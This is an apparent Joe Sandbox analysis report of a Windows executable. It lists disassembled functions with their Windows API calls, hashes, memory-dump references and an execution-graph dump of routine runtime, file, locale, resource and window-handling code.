• Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
• Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
• Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
• Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
• Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
• Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
• Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
• Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
• Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(006FFCA8,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,006FFCA8,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(006FED58,?,00000000,00008000,006FFCA8,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: Xo
• API String ID: 3782394904-37304168
• Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
• Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
  • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
  • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
• Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
• Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
• Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitMessageProcess
                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                      • API String ID: 1220098344-1503883590
                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                      • String ID:
                                                                                      • API String ID: 262959230-0
                                                                                      • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                      • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                                      • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandHandleLineModule
                                                                                      • String ID: U1hd.@$`&n
                                                                                      • API String ID: 2123368496-4055354193
                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                      • String ID:
                                                                                      • API String ID: 730355536-0
                                                                                      • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                      • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1458359878-0
                                                                                      • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                                      • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                                      • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                                      • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD

Execution Graph

Execution Coverage: 16.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 50
TlsGetValue TlsGetValue 49013->49076 49015 403494 4 API calls 49014->49015 49016 452483 49015->49016 49017 403420 4 API calls 49016->49017 49018 45249d 49017->49018 49019 403400 4 API calls 49018->49019 49020 4524a5 49019->49020 49020->48936 49021->48936 49022->48936 49035 403738 49023->49035 49026 42c726 49029 403494 4 API calls 49026->49029 49027 42c70f 49027->49026 49028 42c717 49027->49028 49030 4034e0 4 API calls 49028->49030 49031 42c724 49029->49031 49030->49031 49031->48995 49037 42cba8 49032->49037 49036 40373c GetFullPathNameA 49035->49036 49036->49026 49036->49027 49043 42ca9c 49037->49043 49039 42cbca 49040 42cbd2 GetFileAttributesA 49039->49040 49041 403400 4 API calls 49040->49041 49042 42cbef 49041->49042 49042->48984 49044 42c59c IsDBCSLeadByte 49043->49044 49045 42caad 49044->49045 49047 42cad4 49045->49047 49053 42ca20 CharPrevA 49045->49053 49048 42caea 49047->49048 49049 42cadf 49047->49049 49051 403778 4 API calls 49048->49051 49050 403494 4 API calls 49049->49050 49052 42cae8 49050->49052 49051->49052 49052->49039 49053->49045 49055 403400 4 API calls 49054->49055 49056 452365 49055->49056 49059 452392 49056->49059 49077 403510 49056->49077 49080 403800 49056->49080 49060 403400 4 API calls 49059->49060 49061 4523a7 49060->49061 49061->49013 49063 40363c 49062->49063 49064 4034bc 4 API calls 49063->49064 49065 40364f 49064->49065 49066 403450 4 API calls 49065->49066 49067 403677 49066->49067 49084 45132c 49068->49084 49070 45160e 49071 451612 49070->49071 49090 42cc38 49070->49090 49071->49013 49076->49013 49078 4034e0 4 API calls 49077->49078 49079 40351d 49078->49079 49079->49056 49081 403804 49080->49081 49083 40382f 49080->49083 49082 4038a4 4 API calls 49081->49082 49082->49083 49083->49056 49085 451336 49084->49085 49086 45133a 49084->49086 49085->49070 49087 451343 Wow64DisableWow64FsRedirection 49086->49087 49088 45135c SetLastError 49086->49088 49089 451357 49087->49089 49088->49089 49089->49070 49091 42cba8 7 API calls 49090->49091 
49092 42cc42 GetLastError 49091->49092 49093 451368 49092->49093 49094 451377 49093->49094 49095 45136d Wow64RevertWow64FsRedirection 49093->49095 49094->49013 49095->49094 49097 40d0b6 49096->49097 49107 40d170 FindResourceA 49097->49107 49099 40d0e4 49100 477a6c 49099->49100 49119 40cf00 49100->49119 49108 40d195 49107->49108 49109 40d19c LoadResource 49107->49109 49117 40d0fc 19 API calls 49108->49117 49110 40d1b6 SizeofResource LockResource 49109->49110 49111 40d1af 49109->49111 49114 40d1d4 49110->49114 49118 40d0fc 19 API calls 49111->49118 49114->49099 49115 40d19b 49115->49109 49116 40d1b5 49116->49110 49117->49115 49118->49116 49124 40cdb0 49119->49124 49121 40cf1a 49136 40cee8 49121->49136 49125 40cdbd 49124->49125 49126 40cdd9 49125->49126 49127 40ce0e 49125->49127 49140 406e28 49126->49140 49144 406de8 CreateFileA 49127->49144 49130 40cde0 49132 40ce07 49130->49132 49143 408c94 19 API calls 49130->49143 49131 40ce18 49131->49132 49145 408c94 19 API calls 49131->49145 49132->49121 49135 40ce3f 49135->49132 49141 403738 49140->49141 49142 406e44 CreateFileA 49141->49142 49142->49130 49143->49132 49144->49131 49145->49135 49148 403400 4 API calls 49147->49148 49156 450a3d 49148->49156 49149 403420 4 API calls 49150 450af5 49149->49150 49150->48977 49151 450a54 49153 40357c 4 API calls 49151->49153 49152 4034e0 4 API calls 49152->49156 49154 450a68 49153->49154 49154->49149 49155 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49155->49156 49156->49151 49156->49152 49156->49154 49156->49155 51035 42e24b SetErrorMode 51036 41fac8 51037 41fad1 51036->51037 51040 41fd6c 51037->51040 51039 41fade 51041 41fe5e 51040->51041 51042 41fd83 51040->51042 51041->51039 51042->51041 51061 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 51042->51061 51044 41fdb9 51045 41fde3 51044->51045 51046 41fdbd 51044->51046 51071 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 51045->51071 51062 41fb0c 51046->51062 51050 41fdf1 
51052 41fdf5 51050->51052 51053 41fe1b 51050->51053 51051 41fb0c 10 API calls 51055 41fde1 51051->51055 51056 41fb0c 10 API calls 51052->51056 51054 41fb0c 10 API calls 51053->51054 51057 41fe2d 51054->51057 51055->51039 51058 41fe07 51056->51058 51060 41fb0c 10 API calls 51057->51060 51059 41fb0c 10 API calls 51058->51059 51059->51055 51060->51055 51061->51044 51063 41fb27 51062->51063 51064 41fb3d 51063->51064 51065 41f8ac 4 API calls 51063->51065 51072 41f8ac 51064->51072 51065->51064 51067 41fb85 51068 41fba8 SetScrollInfo 51067->51068 51080 41fa0c 51068->51080 51071->51050 51091 418150 51072->51091 51074 41f8c9 GetWindowLongA 51075 41f906 51074->51075 51076 41f8e6 51074->51076 51094 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 51075->51094 51093 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 51076->51093 51079 41f8f2 51079->51067 51081 41fa1a 51080->51081 51082 41fa22 51080->51082 51081->51051 51083 41fa61 51082->51083 51084 41fa51 51082->51084 51090 41fa5f 51082->51090 51096 417db8 IsWindowVisible ScrollWindow SetWindowPos 51083->51096 51095 417db8 IsWindowVisible ScrollWindow SetWindowPos 51084->51095 51085 41faa1 GetScrollPos 51085->51081 51088 41faac 51085->51088 51089 41fabb SetScrollPos 51088->51089 51089->51081 51090->51085 51092 41815a 51091->51092 51092->51074 51093->51079 51094->51079 51095->51090 51096->51090 51097 420508 51098 42051b 51097->51098 51118 415aa0 51098->51118 51100 420662 51101 420679 51100->51101 51125 414644 KiUserCallbackDispatcher 51100->51125 51106 420690 51101->51106 51126 414688 KiUserCallbackDispatcher 51101->51126 51102 4205c1 51123 4207b8 20 API calls 51102->51123 51107 4206b2 51106->51107 51127 41ffd0 12 API calls 51106->51127 51108 420556 51108->51100 51108->51102 51111 4205b2 MulDiv 51108->51111 51109 4205da 51109->51100 51124 41ffd0 12 API calls 51109->51124 51122 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 51111->51122 51114 4205f7 51115 420613 MulDiv 51114->51115 51116 420636 
51114->51116 51115->51116 51116->51100 51117 42063f MulDiv 51116->51117 51117->51100 51119 415ab2 51118->51119 51128 4143e0 51119->51128 51121 415aca 51121->51108 51122->51102 51123->51109 51124->51114 51125->51101 51126->51106 51127->51107 51129 4143fa 51128->51129 51132 4105b8 51129->51132 51131 414410 51131->51121 51135 40de04 51132->51135 51134 4105be 51134->51131 51136 40de66 51135->51136 51137 40de17 51135->51137 51142 40de74 51136->51142 51140 40de74 19 API calls 51137->51140 51141 40de41 51140->51141 51141->51134 51143 40de84 51142->51143 51145 40de9a 51143->51145 51154 40d740 51143->51154 51174 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51143->51174 51157 40e0ac 51145->51157 51148 40d740 5 API calls 51149 40dea2 51148->51149 51149->51148 51150 40df0e 51149->51150 51160 40dcc0 51149->51160 51151 40e0ac 5 API calls 51150->51151 51153 40de70 51151->51153 51153->51134 51175 40eb68 51154->51175 51183 40d61c 51157->51183 51192 40e0b4 51160->51192 51165 40eacc 5 API calls 51166 40dd09 51165->51166 51167 40dd24 51166->51167 51168 40dd1b 51166->51168 51173 40dd21 51166->51173 51208 40db38 51167->51208 51211 40dc28 19 API calls 51168->51211 51171 403420 4 API calls 51172 40ddef 51171->51172 51172->51149 51173->51171 51174->51143 51178 40d8e0 51175->51178 51180 40d8eb 51178->51180 51179 40d74a 51179->51143 51180->51179 51182 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51180->51182 51182->51180 51184 40eb68 5 API calls 51183->51184 51185 40d629 51184->51185 51186 40d63c 51185->51186 51190 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51185->51190 51186->51149 51188 40d637 51191 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51188->51191 51190->51188 51191->51186 51212 40d8c4 51192->51212 51195 40eb68 5 API calls 51196 40e0d8 51195->51196 51198 40dcf3 51196->51198 51215 40e038 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51196->51215 51199 40eacc 51198->51199 51200 40d8e0 
5 API calls 51199->51200 51201 40eae1 51200->51201 51202 4034e0 4 API calls 51201->51202 51203 40eaef 51202->51203 51204 403744 4 API calls 51203->51204 51205 40eaf6 51204->51205 51206 40d8e0 5 API calls 51205->51206 51207 40dcfe 51206->51207 51207->51165 51216 40acdc 19 API calls 51208->51216 51210 40db60 51210->51173 51211->51173 51213 40eb68 5 API calls 51212->51213 51214 40d8ce 51213->51214 51214->51195 51214->51198 51215->51198 51216->51210 51217 440dc8 51218 440dd1 51217->51218 51219 440ddf WriteFile 51217->51219 51218->51219 51220 440dea 51219->51220 53845 4135ac SetWindowLongA GetWindowLongA 53846 413609 SetPropA SetPropA 53845->53846 53847 4135eb GetWindowLongA 53845->53847 53851 41f30c 53846->53851 53847->53846 53848 4135fa SetWindowLongA 53847->53848 53848->53846 53856 4151e0 53851->53856 53863 423b7c 53851->53863 53957 4239f4 53851->53957 53852 413659 53857 4151ed 53856->53857 53858 415253 53857->53858 53859 415248 53857->53859 53862 415251 53857->53862 53964 424afc 13 API calls 53858->53964 53859->53862 53965 414fcc 46 API calls 53859->53965 53862->53852 53868 423bb2 53863->53868 53866 423c5c 53869 423c63 53866->53869 53870 423c97 53866->53870 53867 423bfd 53871 423c03 53867->53871 53872 423cc0 53867->53872 53890 423bd3 53868->53890 53966 423ad8 53868->53966 53873 423c69 53869->53873 53908 423f21 53869->53908 53876 423ca2 53870->53876 53877 42400a IsIconic 53870->53877 53874 423c35 53871->53874 53875 423c08 53871->53875 53878 423cd2 53872->53878 53879 423cdb 53872->53879 53881 423e83 SendMessageA 53873->53881 53882 423c77 53873->53882 53874->53890 53906 423c4e 53874->53906 53907 423daf 53874->53907 53884 423d66 53875->53884 53885 423c0e 53875->53885 53886 424046 53876->53886 53887 423cab 53876->53887 53883 42401e GetFocus 53877->53883 53877->53890 53888 423ce8 53878->53888 53889 423cd9 53878->53889 53975 424104 11 API calls 53879->53975 53881->53890 53882->53890 53909 423c30 53882->53909 53931 423ec6 53882->53931 53883->53890 53894 42402f 53883->53894 
53980 423af4 NtdllDefWindowProc_A 53884->53980 53895 423c17 53885->53895 53896 423d8e PostMessageA 53885->53896 53995 4247c0 WinHelpA PostMessageA 53886->53995 53892 42405d 53887->53892 53887->53909 53893 42414c 11 API calls 53888->53893 53976 423af4 NtdllDefWindowProc_A 53889->53976 53890->53852 53904 424066 53892->53904 53905 42407b 53892->53905 53893->53890 53994 41ef64 GetCurrentThreadId 73A15940 53894->53994 53901 423c20 53895->53901 53902 423e15 53895->53902 53981 423af4 NtdllDefWindowProc_A 53896->53981 53914 423c29 53901->53914 53915 423d3e IsIconic 53901->53915 53916 423e1e 53902->53916 53917 423e4f 53902->53917 53903 423da9 53903->53890 53918 424444 5 API calls 53904->53918 53996 42449c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53905->53996 53906->53909 53910 423d7b 53906->53910 53970 423af4 NtdllDefWindowProc_A 53907->53970 53908->53890 53927 423f47 IsWindowEnabled 53908->53927 53909->53890 53974 423af4 NtdllDefWindowProc_A 53909->53974 53923 4240e8 12 API calls 53910->53923 53913 424036 53913->53890 53925 42403e SetFocus 53913->53925 53914->53909 53934 423d01 53914->53934 53919 423d5a 53915->53919 53920 423d4e 53915->53920 53983 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53916->53983 53971 423af4 NtdllDefWindowProc_A 53917->53971 53918->53890 53979 423af4 NtdllDefWindowProc_A 53919->53979 53978 423b30 15 API calls 53920->53978 53923->53890 53924 423db5 53932 423df3 53924->53932 53933 423dd1 53924->53933 53925->53890 53927->53890 53936 423f55 53927->53936 53930 423e55 53937 423e6d 53930->53937 53972 41ee14 GetCurrentThreadId 73A15940 53930->53972 53931->53890 53946 423ee8 IsWindowEnabled 53931->53946 53939 4239f4 6 API calls 53932->53939 53982 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53933->53982 53934->53890 53977 422bbc ShowWindow PostMessageA PostQuitMessage 53934->53977 53935 423e26 53941 423e38 53935->53941 53984 41eec8 53935->53984 53949 423f5c IsWindowVisible 53936->53949 53945 
4239f4 6 API calls 53937->53945 53948 423dfb PostMessageA 53939->53948 53990 423af4 NtdllDefWindowProc_A 53941->53990 53945->53890 53946->53890 53950 423ef6 53946->53950 53947 423dd9 PostMessageA 53947->53890 53948->53890 53949->53890 53951 423f6a GetFocus 53949->53951 53991 412280 7 API calls 53950->53991 53953 418150 53951->53953 53954 423f7f SetFocus 53953->53954 53992 4151b0 53954->53992 53958 423a7d 53957->53958 53959 423a04 53957->53959 53958->53852 53959->53958 53960 423a0a EnumWindows 53959->53960 53960->53958 53961 423a26 GetWindow GetWindowLongA 53960->53961 53997 42398c GetWindow 53960->53997 53962 423a45 53961->53962 53962->53958 53963 423a71 SetWindowPos 53962->53963 53963->53958 53963->53962 53964->53862 53965->53862 53967 423ae2 53966->53967 53968 423aed 53966->53968 53967->53968 53969 408688 7 API calls 53967->53969 53968->53866 53968->53867 53969->53968 53970->53924 53971->53930 53973 41ee99 53972->53973 53973->53937 53974->53890 53975->53890 53976->53890 53977->53890 53978->53890 53979->53890 53980->53890 53981->53903 53982->53947 53983->53935 53985 41eed0 IsWindow 53984->53985 53986 41eefc 53984->53986 53987 41eeea 53985->53987 53988 41eedf EnableWindow 53985->53988 53986->53941 53987->53985 53987->53986 